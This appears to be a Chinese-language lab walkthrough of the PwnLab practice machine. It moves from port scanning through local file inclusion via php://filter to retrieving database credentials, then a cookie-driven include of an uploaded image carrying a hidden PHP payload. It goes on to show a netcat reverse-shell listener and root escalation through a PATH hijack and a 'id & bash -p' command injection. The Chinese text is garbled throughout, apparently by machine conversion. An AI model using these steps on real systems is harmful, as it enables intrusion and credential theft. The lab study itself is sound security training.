免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责
服务探测
┌──(rootkali)-[~/pg/PwnLab]└─# nmap -p- 192.168.151.29 --open Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 07:50 ESTNmap scan report for 192.168.151.29Host is up (0.22s latency).Not shown: 65257 closed ports, 274 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE80/tcp open http111/tcp open rpcbind3306/tcp open mysql53955/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 94.55 seconds ┌──(rootkali)-[~/pg/PwnLab]└─# nmap -sV -T5 -A -O 192.168.151.29 -p 80,111,3306,53955Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 07:52 ESTNmap scan report for 192.168.151.29Host is up (0.23s latency).PORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.10 ((Debian))|_http-server-header: Apache/2.4.10 (Debian)|_http-title: PwnLab Intranet Image Hosting111/tcp open rpcbind 2-4 (RPC #100000)| rpcinfo: | program version port/proto service| 100000 2,3,4 111/tcp rpcbind| 100000 2,3,4 111/udp rpcbind| 100000 3,4 111/tcp6 rpcbind| 100000 3,4 111/udp6 rpcbind| 100024 1 35282/udp status| 100024 1 43712/tcp6 status| 100024 1 47161/udp6 status|_ 100024 1 53955/tcp status3306/tcp open mysql MySQL 5.5.47-0+deb8u1| mysql-info: | Protocol: 10| Version: 5.5.47-0+deb8u1| Thread ID: 38| Capabilities flags: 63487| Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, Speaks41ProtocolNew, LongPassword, FoundRows, SupportsTransactions, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, LongColumnFlag, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults| Status: Autocommit| Salt: mT<l1J`%6|5-#fZn=&BZ|_ Auth Plugin Name: mysql_native_password53955/tcp open status 1 (RPC #100024)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%), Linux 3.11 - 4.1 (90%), Linux 3.2 - 4.9 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsTRACEROUTE (using port 443/tcp)HOP RTT ADDRESS1 227.38 ms 192.168.49.12 227.59 ms 192.168.151.29OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 39.73 secondsweb
┌──(rootkali)-[~/pg/PwnLab]└─# python3 /root/dirsearch/dirsearch.py -e* -u http://192.168.151.29 -t 30 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15492Output File: /root/dirsearch/reports/192.168.151.29/_22-01-17_07-55-55.txtError Log: /root/dirsearch/logs/errors-22-01-17_07-55-55.logTarget: http://192.168.151.29/[07:55:55] Starting: [07:57:33] 200 - 0B - /config.php [07:57:59] 200 - 943B - /images/ [07:57:59] 301 - 317B - /images -> http://192.168.151.29/images/ [07:58:02] 200 - 332B - /index.php/login/ [07:58:02] 200 - 332B - /index.php [07:58:09] 200 - 250B - /login.php [07:58:59] 301 - 317B - /upload -> http://192.168.151.29/upload/ [07:59:00] 200 - 19B - /upload.php [07:59:00] 200 - 743B - /upload/ 跑出4个php文件,config.php,index.php,upload.php,login.php
两个文件夹images和upload
rpc
┌──(rootkali)-[~/pg/PwnLab]└─# rpcinfo 192.168.151.29 1 ⨯ program version netid address service owner 100000 4 tcp6 ::.0.111 portmapper superuser 100000 3 tcp6 ::.0.111 portmapper superuser 100000 4 udp6 ::.0.111 portmapper superuser 100000 3 udp6 ::.0.111 portmapper superuser 100000 4 tcp 0.0.0.0.0.111 portmapper superuser 100000 3 tcp 0.0.0.0.0.111 portmapper superuser 100000 2 tcp 0.0.0.0.0.111 portmapper superuser 100000 4 udp 0.0.0.0.0.111 portmapper superuser 100000 3 udp 0.0.0.0.0.111 portmapper superuser 100000 2 udp 0.0.0.0.0.111 portmapper superuser 100000 4 local /run/rpcbind.sock portmapper superuser 100000 3 local /run/rpcbind.sock portmapper superuser 100024 1 udp 0.0.0.0.137.210 status 106 100024 1 tcp 0.0.0.0.210.195 status 106 100024 1 udp6 ::.184.57 status 106 100024 1 tcp6 ::.170.192 status 106┌──(rootkali)-[~/pg/PwnLab]└─# nmap -sSUC -p 111 192.168.151.29 130 ⨯Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-17 08:05 ESTNmap scan report for 192.168.151.29Host is up (0.33s latency).PORT STATE SERVICE111/tcp open rpcbind| rpcinfo: | program version port/proto service| 100000 2,3,4 111/tcp rpcbind| 100000 2,3,4 111/udp rpcbind| 100000 3,4 111/tcp6 rpcbind| 100000 3,4 111/udp6 rpcbind| 100024 1 35282/udp status| 100024 1 43712/tcp6 status| 100024 1 47161/udp6 status|_ 100024 1 53955/tcp status111/udp open|filtered rpcbind| rpcinfo: | program version port/proto service| 100000 2,3,4 111/tcp rpcbind| 100000 2,3,4 111/udp rpcbind| 100000 3,4 111/tcp6 rpcbind| 100000 3,4 111/udp6 rpcbind| 100024 1 35282/udp status| 100024 1 43712/tcp6 status| 100024 1 47161/udp6 status|_ 100024 1 53955/tcp statusNmap done: 1 IP address (1 host up) scanned in 26.38 seconds没什么特地有用的信息。
LFI
首页url格局是:
http://192.168.151.29/?page=page前面当初只有两个参数login和uoload
应用php伪协定触发文件蕴含破绽。
上面playload读取login源码
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=login页面打印
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==base64 decode
<?phpsession_start();require("config.php");$mysqli = new mysqli($server, $username, $password, $database);if (isset($_POST['user']) and isset($_POST['pass'])){ $luser = $_POST['user']; $lpass = base64_encode($_POST['pass']); $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?"); $stmt->bind_param('ss', $luser, $lpass); $stmt->execute(); $stmt->store_Result(); if ($stmt->num_rows == 1) { $_SESSION['user'] = $luser; header('Location: ?page=upload'); } else { echo "Login failed."; }}else{ ?> <form action="" method="POST"> <label>Username: </label><input id="user" type="test" name="user"><br /> <label>Password: </label><input id="pass" type="password" name="pass"><br /> <input type="submit" name="submit" value="Login"> </form> <?php}应用上面playload读取upload源码
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=upload<?phpsession_start();if (!isset($_SESSION['user'])) { die('You must be log in.'); }?><html> <body> <form action='' method='post' enctype='multipart/form-data'> <input type='file' name='file' id='file' /> <input type='submit' name='submit' value='Upload'/> </form> </body></html><?php if(isset($_POST['submit'])) { if ($_FILES['file']['error'] <= 0) { $filename = $_FILES['file']['name']; $filetype = $_FILES['file']['type']; $uploaddir = 'upload/'; $file_ext = strrchr($filename, '.'); $imageinfo = getimagesize($_FILES['file']['tmp_name']); $whitelist = array(".jpg",".jpeg",".gif",".png"); if (!(in_array($file_ext, $whitelist))) { die('Not allowed extension, please upload images only.'); } if(strpos($filetype,'image') === false) { die('Error 001'); } if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') { die('Error 002'); } if(substr_count($filetype, '/')>1){ die('Error 003'); } $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext; if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) { echo "<img src=\"".$uploadfile."\"><br />"; } else { die('Error 4'); } }}?>应用上面playload读取config源码
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=config<?php$server = "localhost";$username = "root";$password = "H4u%QJ_H99";$database = "Users";?>当初咱们晓得了mysql的账号密码,因为靶机开启了外放的mysql服务,咱们能够从攻击机间接连贯靶机mysql。
mysql
没有进入users数据库的权限
MySQL [(none)]> show databases;+--------------------+| Database |+--------------------+| information_schema || Users |+--------------------+2 rows in set (0.243 sec)MySQL [(none)]> use users;ERROR 1044 (42000): Access denied for user 'root'@'%' to database 'users'然而有查问users数据库的权限
MySQL [information_schema]> show grants;+------------------------------------------------------------------+| Grants for root@% |+------------------------------------------------------------------+| GRANT USAGE ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD <secret> || GRANT SELECT ON `Users`.* TO 'root'@'%' |+------------------------------------------------------------------+2 rows in set (0.228 sec)查问表名和表数据
MySQL [information_schema]> select * from tables where table_schema = 'Users';+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME | UPDATE_TIME | CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+| def | Users | users | BASE TABLE | InnoDB | 10 | Compact | 3 | 5461 | 16384 | 0 | 0 | 10485760 | NULL | 2016-03-17 10:17:53 | NULL | NULL | latin1_swedish_ci | NULL | | |+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+1 row in set (1.383 sec)MySQL [information_schema]> select * from Users.users;+------+------------------+| user | pass |+------+------------------+| kent | Sld6WHVCSkpOeQ== || mike | U0lmZHNURW42SQ== || kane | aVN2NVltMkdSbw== |+------+------------------+3 rows in set (0.251 sec)失去三组用户凭据:
kent:JWzXuBJJNymike:SIfdsTEn6Ikane:iSv5Ym2GRo下面登录当前来到上传页面,各种绕过上传失败。。。
下面同样办法查看index.php文件
<?php//Multilingual. Not implemented yet.//setcookie("lang","en.lang.php");if (isset($_COOKIE['lang'])){ include("lang/".$_COOKIE['lang']);}// Not implemented yet.?><html><head><title>PwnLab Intranet Image Hosting</title></head><body><center><img src="images/pwnlab.png"><br />[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]<hr/><br/><?php if (isset($_GET['page'])) { include($_GET['page'].".php"); } else { echo "Use this server to upload and share image files inside the intranet"; }?></center></body></html>注意这行代码,蕴含了一个内部用户能够管制的cookie值,如果这个值变成咱们的图片马就会触发文件解析破绽
include("lang/".$_COOKIE['lang']);当时把一张图片上传,用burpsuite截断,把rever_shell.php代码藏在图片数据里,失去一张图片马:ae3c0cf901daed40d3382c6c67c15a63.jpg
应用curl触发蕴含cookie,触发文件解析破绽
┌──(rootkali)-[~/pg/PwnLab]└─# curl -v --cookie "lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg" http://192.168.151.29/index.php* Trying 192.168.151.29:80...* Connected to 192.168.151.29 (192.168.151.29) port 80 (#0)> GET /index.php HTTP/1.1> Host: 192.168.151.29> User-Agent: curl/7.74.0> Accept: */*> Cookie: lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg> 收到反弹shell
└─# nc -lnvp 4242 130 ⨯listening on [any] 4242 ...connect to [192.168.49.151] from (UNKNOWN) [192.168.151.29] 38751Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux 11:03:44 up 3:17, 0 users, load average: 0.00, 0.01, 0.05USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATuid=33(www-data) gid=33(www-data) groups=33(www-data)/bin/sh: 0: can't access tty; job control turned off$ iduid=33(www-data) gid=33(www-data) groups=33(www-data)$ whoamiwww-data提权
咱们下面拿到的用户凭据
kent:JWzXuBJJNymike:SIfdsTEn6Ikane:iSv5Ym2GRokent和kane能够通过下面的明码自在切换bash
在kane拿到local.txt
kane的家目录下还有个SUID:msgmike,属主是mike
用strings命令查看
kane@pwnlab:~$ strings msgmikestrings msgmike/lib/ld-linux.so.2libc.so.6_IO_stdin_usedsetregidsetreuidsystem__libc_start_main__gmon_start__GLIBC_2.0PTRh QVh[[^_]cat /home/mike/msg.txt执行了一条cat /home/mike/msg.txt
能够通过劫持cat命令提权
把/home/kane写入$PATH
export PATH=/home/kane:$PATH创立一个cat文件,并且给予执行权限
touch /home/kane/catchmod +x /home/kane/cat把上面的shell写进/home/kane/cat
#!/bin/bashbash -p执行/home/kane/cat命令,提权到mike
kane@pwnlab:~$ ./msgmike./msgmikemike@pwnlab:~$whoamiwhoamimike在mike的home目录里,有一个msg2root文件,也是一个SUID,属主是root,持续用strings命令查看
mike@pwnlab:/home/mike$ strings msg2rootstrings msg2root/lib/ld-linux.so.2libc.so.6_IO_stdin_usedstdinfgetsasprintfsystem__libc_start_main__gmon_start__GLIBC_2.0PTRh[^_]Message for root: /bin/echo %s >> /root/messages.txt执行了一条/bin/echo %s >> /root/messages.txt命令
%s是咱们输出的内容,因而同样能够劫持这条命令
Message for root: id & bash -pid & bash -pbash-4.3# idbash-4.3# whoamiwhoamiroot拿到proof.txt
bash-4.3# more proof.txtmore proof.txt8ae5471d5970a5...总结
上传的利用原理解释如下:
首先Apache的版本号是:2.4.10,apache的2.4.0~2.4.29存在一个解析破绽,见这里
此靶机的破绽利用就是应用了Apache HTTPD 多后缀解析破绽
什么是多后缀解析破绽?
如果一个文件里有php代码,那么只有拜访的url里蕴含了.php后缀,那么这个文件都会被当成php文件解析,比方test.php.jpg
查看这台靶机的源代码,留神这行:
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;这里指定了上传后的文件名是源文件名的md5格局,后缀是白名单里容许的扩展名,所以失常状况咱们无奈绕过上传限度。
然而因为index.php里呈现的这一行代码
include("lang/".$_COOKIE['lang']);这个lang值咱们是能够管制的(应用curl指定cookie值),当初只须要把lang值换成咱们的图片马,那蕴含的图片马因为在一个php文件外面,所以就触发了apache的文件解析破绽,被当成了php代码执行。
概念代码如下
<?phpinclude('evil.jpg');?>